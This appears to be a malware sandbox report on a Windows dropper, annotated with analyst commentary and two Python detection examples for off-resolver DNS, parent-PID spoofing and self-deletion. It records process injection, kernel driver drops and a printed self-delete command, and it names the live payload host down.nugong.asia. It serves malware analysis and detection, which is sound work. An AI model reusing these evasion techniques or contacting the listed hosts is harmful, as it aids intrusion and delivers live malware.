Analysis
-
max time kernel: 150s
max time network: 149s
platform: windows7_x64
resource: win7-20231020-en
resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
submitted: 16/11/2023, 12:03 UTC
Static task: static1
Behavioral task: behavioral1
Sample: aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
Resource: win7-20231020-en
General
-
Target: aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
Size: 2.0MB
MD5: 2f3353e9de4535e858254b2f9ebe0e70
SHA1: beb0fe2c7a977abf0f292477466be291fca80a9a
SHA256: aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00
SHA512: 909bb4cd1108fefed5bdf68af29eb0fbc5584f6c9ce7b7a15790af2c24ac2898ab132e7e95b7ba636c131c645e8aee95ef749dc24f7f05c2eb3808ab6c2146d7
SSDEEP: 49152:8Us4vWvQznXPwh11sXIAyT9tN93ul/lDxqqqoqqqdT:ls4iKXPs1sByTNT
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target
- PID 1304 created 420 | 1304 Explorer.EXE | procid_target 2
- PID 1304 created 420 | 1304 Explorer.EXE | procid_target 2
PID 420 is winlogon.exe (procid 2 in the process tree below). The two rows line up with the two processes that the tree shows under winlogon.exe, autofmt.exe and charmap.exe: Explorer.EXE (1304) performs the creation and the new process is given winlogon.exe as its parent, which is the parent-PID-spoofing pattern. Any tree built from parent PID alone (including this report's own) therefore shows the children under winlogon.exe rather than under Explorer.EXE.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process
- File created C:\Windows\System32\drivers\HMbLwp.sys charmap.exe
- File opened for modification C:\Windows\system32\drivers\JmhoT2djjF.sys charmap.exe
- File opened for modification C:\Windows\system32\drivers\8P6gFQ8gor2.moj charmap.exe
Together with vFPZHNBo.sys and C:\Windows\NnQoZGsXT.sys in the System32 and Windows directory signatures below, charmap.exe writes four .sys files with random-looking names plus a .moj file, and the LoadsDriver signature follows: a kernel component is being installed, not only a user-mode payload.
-
Deletes itself 1 IoCs
pid Process
- 692 cmd.exe
-
Executes dropped EXE 2 IoCs
pid Process
- 2688 autofmt.exe
- 2788 charmap.exe
-
YARA rule match: upx
resource yara_rule
- behavioral1/files/0x0006000000015e3e-129.dat upx
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc
- Destination IP 114.114.114.114
The guest's configured resolver is 8.8.8.8 (every other lookup in the Network section goes there). 114.114.114.114 is a public resolver in China; the only name sent to it is down.nugong.asia, the host that serves the sample's configuration files and ZIP payloads, so the sample most likely carries that resolver address itself rather than using the system stub resolver for its download host. A detection built on this signature should therefore key on the destination of port-53 traffic, not on the queried name.
-
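The check behind this signature, written out as an added example that is not part of the sandbox report: parse a small constructed DNS flow log (shaped on the Network section of this report; the process column is "-" where the report does not attribute the lookup) and list every port-53 destination that is not a configured resolver, together with the names asked of it. The configured resolver set {8.8.8.8} and the function names are assumptions for the example.

```python
"""Detection behind the "Unexpected DNS network traffic destination"
signature: list port-53 destinations that are not a configured resolver.
Added example; the log lines are constructed, not sandbox output."""
import ipaddress
from collections import defaultdict

# Assumed resolver configuration of the guest: the address every other
# lookup in this report goes to.
CONFIGURED_RESOLVERS = {ipaddress.ip_address("8.8.8.8")}

# Constructed flow records shaped on the Network section:
# process<TAB>dst_ip<TAB>dst_port<TAB>query.  "-" = not attributed by the report.
CONSTRUCTED_DNS_LOG = (
    "aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe\t8.8.8.8\t53\t"
    "54e03c235962947852b3fe22714547f2.vbnm34567.xyz\n"
    "-\t114.114.114.114\t53\tdown.nugong.asia\n"
    "charmap.exe\t119.167.229.212\t80\t-\n"          # HTTP, not DNS: must be ignored
    "-\t8.8.8.8\t53\tapps.game.qq.com\n"
    "-\t8.8.8.8\t53\tocsp.trust-provider.cn\n"
)


def parse_dns_log(text):
    """Return (process, dst_ip, dst_port, query) tuples from the tab-separated log."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        proc, dst, port, query = line.split("\t")
        rows.append((proc, ipaddress.ip_address(dst), int(port), query))
    return rows


def unexpected_resolvers(rows, configured=CONFIGURED_RESOLVERS):
    """Map each port-53 destination outside `configured` to the sorted list of
    names queried there, so the analyst sees what was resolved off-resolver."""
    hits = defaultdict(set)
    for _proc, dst, port, query in rows:
        if port == 53 and dst not in configured:
            hits[dst].add(query)
    return {str(ip): sorted(names) for ip, names in hits.items()}


if __name__ == "__main__":
    for ip, names in unexpected_resolvers(parse_dns_log(CONSTRUCTED_DNS_LOG)).items():
        print(f"off-resolver DNS to {ip}: {', '.join(names)}")
```

On a real host the configured set comes from the adapter's DHCP/static DNS settings, not from a constant; traffic to port 53 that is not DNS at all (tunnelling, C2 on 53) is flagged by the same rule, which is intended.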
Drops file in System32 directory 13 IoCs
description ioc Process
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3FE2BD01AB6BC312BF0DADE7F797388F_896832C6BC857CFAEA9E59E166B13E2C charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\349D186F1CB5682FA0194D4F3754EF36_CE21678B3713ACF5F5ED4AAA700C6173 charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3FE2BD01AB6BC312BF0DADE7F797388F_896832C6BC857CFAEA9E59E166B13E2C charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0766DB9AB186806BB9A6B6802D3BA734 charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_50D7940D5D3FEDD8634D83074C7A46A3 charmap.exe
- File created C:\Windows\system32\ \Windows\System32\vFPZHNBo.sys charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0766DB9AB186806BB9A6B6802D3BA734 charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AD5F118F7897046E8CA970AE6A6AB70B_ADB601E2C381343DA1163E5F08582475 charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AD5F118F7897046E8CA970AE6A6AB70B_ADB601E2C381343DA1163E5F08582475 charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\349D186F1CB5682FA0194D4F3754EF36_CE21678B3713ACF5F5ED4AAA700C6173 charmap.exe
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_50D7940D5D3FEDD8634D83074C7A46A3 charmap.exe
Twelve of the thirteen rows are CryptnetUrlCache files under the SYSTEM profile (config\systemprofile). CryptoAPI writes those when it fetches OCSP responses or CRLs over HTTP (the Microsoft-CryptoAPI/6.1 requests in the Network section); they show that charmap.exe runs as SYSTEM but are not malware-authored content. The row that matters is the driver file vFPZHNBo.sys; the path with the empty "system32\ \Windows\System32\" segment is as the sandbox recorded it.
-
Drops file in Windows directory 1 IoCs
description ioc Process
- File created C:\Windows\NnQoZGsXT.sys charmap.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process
- 2880 timeout.exe
-
Modifies data under HKEY_USERS 64 IoCs
description ioc (Process is charmap.exe for every row)
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\WpadNetworkName = "Network 2"
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0079000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\e2-a4-fb-8f-af-0c
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c\WpadDecisionReason = "1"
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c\WpadDecisionTime = a0054ee88418da01
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\WpadDecision = "0"
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
- Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"
- Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\WpadDecisionReason = "1"
- Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c\WpadDecision = "0"
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
All 64 rows are WinINet proxy/WPAD discovery state, Internet Settings defaults and CryptoAPI certificate-store initialisation under HKU\.DEFAULT, the hive a SYSTEM process sees as HKCU. They are the side effect of charmap.exe issuing HTTP requests and validating certificates from the SYSTEM context, not configuration or persistence changes made on purpose; none of them is a Run key, service or policy value.
-
Modifies system certificate store
description ioc Process (certificate blob contents are omitted from this copy of the report)
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 charmap.exe
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob charmap.exe
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
Both keys sit under AuthRoot, the store that the Windows automatic root update mechanism fills when chain building needs a public root that is not yet installed on the machine. The thumbprints are those of DigiCert Global Root CA (A8985D3A…5436) and AAA Certificate Services (D1EB23A4…E349), two public roots; the DigiCert one lines up with the ocsp.digicert.cn lookups in the Network section. This is CryptoAPI chain validation at work, not an attacker-installed trust anchor. Because the signature name alone cannot tell the two apart, confirm by comparing the written Blob with the known root certificate before treating such a row as a trust-store compromise.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process (identical rows collapsed)
- 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe (6 rows)
- 1304 Explorer.EXE (6 rows)
- 2788 charmap.exe (all remaining rows)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process
- 1304 Explorer.EXE
-
Suspicious behavior: LoadsDriver 5 IoCs
pid Process
- 464 Process not Found (5 rows)
PID 464 is not one of the processes the sandbox tracked ("Process not Found"), so the report cannot attribute the five driver loads to a monitored process; that they follow charmap.exe's .sys drops is the only link the report offers.
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process
- Token: SeDebugPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Token: SeTcbPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Token: SeDebugPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Token: SeDebugPrivilege 1304 Explorer.EXE
- Token: SeDebugPrivilege 1304 Explorer.EXE
- Token: SeDebugPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Token: SeDebugPrivilege 2788 charmap.exe
- Token: SeDebugPrivilege 2788 charmap.exe
- Token: SeDebugPrivilege 2788 charmap.exe
- Token: SeIncBasePriorityPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
- Token: SeDebugPrivilege 2788 charmap.exe
- Token: SeBackupPrivilege 2788 charmap.exe
SeDebugPrivilege is what a process needs to open and write into other processes (see the next signature). SeTcbPrivilege ("act as part of the operating system") is normally present only in SYSTEM tokens; the sample asking for it is notable, and whether the request succeeded is not recorded here.
-
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target (identical rows collapsed, count in brackets)
- PID 2512 wrote to memory of 1304 (x5) | 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe | 22
- PID 1304 wrote to memory of 2788 (x8) | 1304 Explorer.EXE | 29
- PID 2512 wrote to memory of 420 (x5) | 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe | 2
- PID 2512 wrote to memory of 692 (x4) | 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe | 31
- PID 692 wrote to memory of 2880 (x4) | 692 cmd.exe | 33
- PID 2788 wrote to memory of 1304 (x4) | 2788 charmap.exe | 22
Parent-to-child writes at creation time (2512 into its cmd.exe 692, 692 into timeout.exe 2880, 1304 into charmap.exe 2788) are part of how CreateProcess sets up a child. The rows that indicate injection are the writes into processes the writer did not create: the sample (2512) into Explorer.EXE (1304) and into winlogon.exe (420), and charmap.exe (2788) back into Explorer.EXE.
Processes
-
C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
  PID: 420
  -
  C:\ProgramData\autofmt.exe
    command line: "C:\ProgramData\autofmt.exe"
    - Executes dropped EXE
    PID: 2688
  -
  C:\charmap.exe
    command line: "C:\charmap.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2788
-
C:\Windows\Explorer.EXE
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1304
  -
  C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2512
    -
    C:\Windows\SysWOW64\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"
      - Deletes itself
      - Suspicious use of WriteProcessMemory
      PID: 692
      -
      C:\Windows\SysWOW64\timeout.exe
        command line: timeout /t 1
        - Delays execution with timeout.exe
        PID: 2880
-
Reading the tree: it is arranged by reported parent PID. autofmt.exe and charmap.exe appear under winlogon.exe (PID 420) although the NtCreateUserProcessOtherParentProcess rows attribute their creation to Explorer.EXE (PID 1304), and the WriteProcessMemory rows show the sample (2512) writing into Explorer.EXE before Explorer.EXE writes into charmap.exe. That sequence is consistent with the sample injecting into Explorer.EXE and the injected code spawning the dropped executables with winlogon.exe as their parent; charmap.exe's later writes under HKU\.DEFAULT and C:\Windows\system32\config\systemprofile fit a process running in the SYSTEM context. Both dropped files borrow the names of Windows binaries (Character Map, the autofmt format utility) but run from C:\ and C:\ProgramData, not from System32. cmd.exe and timeout.exe load from SysWOW64, so the sample is a 32-bit process on this x64 guest (the resource tags list arch:x86 as well as arch:x64); its cmd.exe child is the self-delete, a one-second wait followed by deletion of the original sample from %TEMP%.
-
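How the creator/parent mismatch behind the NtCreateUserProcessOtherParentProcess rows and the cmd.exe self-delete look in process-creation telemetry, as an added example that is neither sandbox output nor the sample's code. The events are constructed to mirror the tree above. The creator_pid field stands for the process ID in the header of a Microsoft-Windows-Kernel-Process ProcessStart event (the caller of NtCreateUserProcess), which a spoofed parent attribute does not change, while parent_pid is the payload's ParentProcessID. Function and field names are assumptions for the example.

```python
"""Two checks over process-creation events for behaviours in this report:
parent-PID spoofing (creator != declared parent) and a cmd.exe child that
waits and then deletes its creator's own image.  Added example; the events
are constructed from the report's process tree, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessStart:
    creator_pid: int   # PID in the ETW event header: caller of NtCreateUserProcess
    new_pid: int       # payload ProcessID
    parent_pid: int    # payload ParentProcessID: the parent the new process reports
    image: str
    cmdline: str


SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"

# Constructed events modelled on the report (Explorer.EXE = 1304, winlogon.exe = 420).
EVENTS = [
    ProcessStart(1304, 2512, 1304, SAMPLE, f'"{SAMPLE}"'),
    ProcessStart(1304, 2688, 420, r"C:\ProgramData\autofmt.exe", r'"C:\ProgramData\autofmt.exe"'),
    ProcessStart(1304, 2788, 420, r"C:\charmap.exe", r'"C:\charmap.exe"'),
    ProcessStart(2512, 692, 2512, r"C:\Windows\SysWOW64\cmd.exe",
                 f'"C:\\Windows\\System32\\cmd.exe" /c timeout /t 1 & del /Q /F "{SAMPLE}"'),
    ProcessStart(692, 2880, 692, r"C:\Windows\SysWOW64\timeout.exe", "timeout /t 1"),
]

# "del [/switches] <path>" at the end of a command line, path optionally quoted.
DEL_RE = re.compile(r'\bdel\b(?:\s+/[a-z])*\s+"?([^"&|]+?)"?\s*$', re.I)
DELAY_RE = re.compile(r"\b(timeout|ping)\b", re.I)


def find_ppid_spoofing(events):
    """Return (new_pid, creator_pid, declared_parent_pid) for every event whose
    creating process is not the parent the child will report."""
    return [(e.new_pid, e.creator_pid, e.parent_pid)
            for e in events if e.creator_pid != e.parent_pid]


def find_self_delete(events):
    """Return (cmd_pid, deleted_path) where a cmd.exe delays and then deletes
    the image of the process that created it."""
    image_of = {e.new_pid: e.image for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e.cmdline)
        if not m or not DELAY_RE.search(e.cmdline):
            continue
        target = m.group(1).strip()
        if target.lower() == image_of.get(e.creator_pid, "").lower():
            hits.append((e.new_pid, target))
    return hits


if __name__ == "__main__":
    for new_pid, creator, parent in find_ppid_spoofing(EVENTS):
        print(f"PPID spoofing: pid {new_pid} created by {creator} but reports parent {parent}")
    for pid, path in find_self_delete(EVENTS):
        print(f"self-delete: cmd.exe pid {pid} removes {path}")
```

Sysmon Event ID 1 records only the declared parent, so the first check needs an ETW consumer (or an EDR that exposes the creator); the second check works on Sysmon command lines alone. Matching the deleted path against the creator's own image, rather than flagging every "timeout & del", is what keeps the rule quiet on ordinary cleanup scripts.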
Network
-
DNS 54e03c235962947852b3fe22714547f2.vbnm34567.xyz (aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe)
Remote address: 8.8.8.8:53
Request: 54e03c235962947852b3fe22714547f2.vbnm34567.xyz IN A
Response: (empty)
-
DNS 54e03c235962947852b3fe22714547f2.vbnm34567.xyz (aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe)
Remote address: 8.8.8.8:53
Request: 54e03c235962947852b3fe22714547f2.vbnm34567.xyz IN A
Response: (empty)
-
DNS down.nugong.asia
Remote address: 114.114.114.114:53
Request: down.nugong.asia IN A
Response:
down.nugong.asia IN CNAME down.nugong.asia.cdn.dnsv1.com.cn
down.nugong.asia.cdn.dnsv1.com.cn IN CNAME ofgk41rd.slt.sched.tdnsv8.com
ofgk41rd.slt.sched.tdnsv8.com IN A 119.167.229.212
ofgk41rd.slt.sched.tdnsv8.com IN A 123.12.213.220
ofgk41rd.slt.sched.tdnsv8.com IN A 123.12.213.243
ofgk41rd.slt.sched.tdnsv8.com IN A 211.93.212.232
ofgk41rd.slt.sched.tdnsv8.com IN A 218.29.50.234
ofgk41rd.slt.sched.tdnsv8.com IN A 221.15.67.145
ofgk41rd.slt.sched.tdnsv8.com IN A 36.248.54.85
ofgk41rd.slt.sched.tdnsv8.com IN A 123.12.213.187
ofgk41rd.slt.sched.tdnsv8.com IN A 118.212.235.109
ofgk41rd.slt.sched.tdnsv8.com IN A 58.144.226.248
ofgk41rd.slt.sched.tdnsv8.com IN A 110.249.196.101
ofgk41rd.slt.sched.tdnsv8.com IN A 118.212.235.102
ofgk41rd.slt.sched.tdnsv8.com IN A 42.56.81.104
ofgk41rd.slt.sched.tdnsv8.com IN A 118.212.235.231
ofgk41rd.slt.sched.tdnsv8.com IN A 42.231.136.215
